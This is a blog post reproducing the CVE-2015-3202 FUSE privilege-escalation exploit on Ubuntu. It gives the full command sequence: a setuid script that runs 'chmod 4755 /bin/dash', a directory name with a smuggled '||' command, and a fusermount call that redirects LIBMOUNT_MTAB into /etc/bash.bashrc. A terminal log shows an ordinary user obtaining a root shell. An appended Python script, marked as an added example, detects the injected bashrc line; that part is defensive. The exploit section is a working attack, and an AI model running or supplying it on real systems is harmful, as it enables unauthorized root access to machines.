
FUSE privilege escalation(CVE-2015-3202)

by blackcon 2015. 6. 3.

/*  FUSE Exploit Closed in all ubuntu OS                                           */

/*  I haven't done a proper analysis yet; just saving the code here for now :D                           */

/*  If I get some free time again, I'll write up a detailed analysis report and post it!! */

/*  https://gist.github.com/taviso/ecb70eb12d461dd85cba      */


<Vulnerable version>


<TEST>

 1. From a regular (non-root) user account, enter the commands in the order shown below.

 2. As the regular user, enter everything up to and including the 'LIBMOUNT_MTAB' line, then log in to the server as root.

 3. The regular user is escalated to root.


[User]
blackcon@bk:~$ 
blackcon@bk:~$ id
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ sh -c 'id' 
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 7555 /tmp/exploit
blackcon@bk:~$ ls -la /tmp
합계 44
drwxrwxrwt  9 root     root     4096  5월 22 16:05 .
drwxr-xr-x 24 root     root     4096  5월 14 21:28 ..
drwxrwxrwt  2 root     root     4096  5월 22 08:56 .ICE-unix
-r--r--r--  1 root     root       11  5월 22 08:56 .X0-lock
drwxrwxrwt  2 root     root     4096  5월 22 16:04 .X11-unix
drwxrwxrwt  2 root     root     4096  5월 22 15:59 VMwareDnD
-rw-------  1 blackcon blackcon    0  5월 22 08:56 config-err-8RAdOZ
-r-sr-sr-t  1 blackcon blackcon   20  5월 22 16:05 exploit
drwx------  2 root     root     4096  5월 22 08:56 pulse-PKdhtXMmr18n
drwx------  2 blackcon blackcon 4096  5월 22 08:56 ssh-dffCiUhLpXS1
drwx------  2 blackcon blackcon 4096  5월 22 15:59 vmware-blackcon
drwx------  2 root     root     4096  5월 22 08:56 vmware-root
blackcon@bk:~$ mkdir -p '/tmp/exploit||/tmp/exploit'
blackcon@bk:~$ ls -ls /tmp
합계 28
4 drwxrwxrwt 2 root     root     4096  5월 22 15:59 VMwareDnD
0 -rw------- 1 blackcon blackcon    0  5월 22 08:56 config-err-8RAdOZ
4 -r-sr-sr-t 1 blackcon blackcon   20  5월 22 16:05 exploit
4 drwxrwxr-x 3 blackcon blackcon 4096  5월 22 16:06 exploit||
4 drwx------ 2 root     root     4096  5월 22 08:56 pulse-PKdhtXMmr18n
4 drwx------ 2 blackcon blackcon 4096  5월 22 08:56 ssh-dffCiUhLpXS1
4 drwx------ 2 blackcon blackcon 4096  5월 22 15:59 vmware-blackcon
4 drwx------ 2 root     root     4096  5월 22 08:56 vmware-root
blackcon@bk:~$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
blackcon@bk:~$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=blackcon 0 0
blackcon@bk:~$ sh -c 'id'
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
blackcon@bk:~$ sh -c 'sh'
# id
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
========================================
[root]    <- just login
blackcon@bk:~$ sudo su
[sudo] password for blackcon: 
bash: /dev/fuse: 허가 거부
           _     _    _                               
          | |   | |  ( )                              
          | |__ | |  |/ ___    _____ ___  ____  _____ 
          |  _ \| |_/ )/___)  (___  / _ \|  _ \| ___ |
          | |_) |  _ (|___ |   / __| |_| | | | | ____|
          |____/|_| \_(___/   (_____\___/|_| |_|_____)  @blackcon

          root@jihwan:/home/jh304# id
          uid=0(root) gid=0(root) groups=0(root)
root@bk:/home/blackcon#
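Detection angle, as an added example that is not part of the original post and not code from the FUSE project: the session above ends with a mount-table record sitting inside /etc/bash.bashrc, and that record is the artefact a defender can look for. The script below (Python; the function names and the sample rc file are constructed here) flags mtab-shaped lines in shell startup files and rates the mount-point field by whether it carries shell operators such as `||`, since bash executes such a line as a command when the file is sourced.

```python
"""Audit shell startup files for injected mount-table lines.

Added example; not code from the original post or from the FUSE project.
Assumption: after the LIBMOUNT_MTAB redirection shown in the session above,
the setuid helper has appended an /etc/mtab-style record to a file that bash
sources (here /etc/bash.bashrc). A record of that shape has no legitimate
place in a shell rc file, so its presence alone is the indicator; shell
metacharacters in the mount-point field raise the severity, because bash will
run that text as a command on the next login.
"""
import re
from dataclasses import dataclass
from typing import List

MTAB_FIELDS = 6  # source  mountpoint  fstype  options  dump  pass
KNOWN_FSTYPES = {"fuse", "fuse.sshfs", "ext4", "ext3", "xfs", "btrfs",
                 "tmpfs", "nfs", "nfs4", "vfat", "proc", "sysfs"}
# operators bash would interpret if the record is sourced as a script
SHELL_METACHARS = re.compile(r"\|\||&&|;|\||\$\(|`")


@dataclass
class Finding:
    path: str
    lineno: int
    line: str
    severity: str  # "high" when the mount point carries shell operators, else "medium"


def looks_like_mtab_entry(line: str) -> bool:
    """Return True when a line has the six-field shape of an /etc/mtab record.

    mtab escapes spaces inside paths as \\040, so whitespace splitting is safe.
    """
    fields = line.split()
    if len(fields) != MTAB_FIELDS:
        return False
    source, _mountpoint, fstype, _options, dump, passno = fields
    if not (dump.isdigit() and passno.isdigit()):
        return False
    # a known filesystem type or a /dev/ source is enough to match
    return fstype in KNOWN_FSTYPES or source.startswith("/dev/")


def scan_rc_text(path: str, text: str) -> List[Finding]:
    """Scan the contents of one rc file and return every suspicious line."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments are never executed
        if not looks_like_mtab_entry(line):
            continue
        mountpoint = line.split()[1]
        severity = "high" if SHELL_METACHARS.search(mountpoint) else "medium"
        findings.append(Finding(path, lineno, line, severity))
    return findings


def scan_rc_file(path: str) -> List[Finding]:
    """Read a real rc file from disk and scan it (used by the __main__ block)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_rc_text(path, fh.read())


# Constructed sample: an /etc/bash.bashrc carrying the record the session
# above produced, surrounded by ordinary Ubuntu bashrc lines.
SAMPLE_BASHRC = """\
# System-wide .bashrc file for interactive bash(1) shells.
[ -z "$PS1" ] && return
shopt -s checkwinsize
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=blackcon 0 0
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
"""


if __name__ == "__main__":
    # Files sourced by login shells; extend the list for other shells.
    for rc in ("/etc/bash.bashrc", "/etc/profile", "/etc/zsh/zshrc"):
        try:
            hits = scan_rc_file(rc)
        except FileNotFoundError:
            continue
        for f in hits:
            print(f"{f.severity.upper()} {f.path}:{f.lineno}: {f.line}")
    # Demonstrate on the constructed sample as well.
    for f in scan_rc_text("sample:/etc/bash.bashrc", SAMPLE_BASHRC):
        print(f"{f.severity.upper()} {f.path}:{f.lineno}: {f.line}")
```

The six-field shape test deliberately ignores what the fields say and only checks that the record is structurally an mtab line with numeric dump/pass fields, so a benign fstab entry pasted into an rc file still surfaces at medium severity; only a mount point containing an operator bash would act on is rated high. On the constructed sample the scan reports exactly one high finding, at line 4.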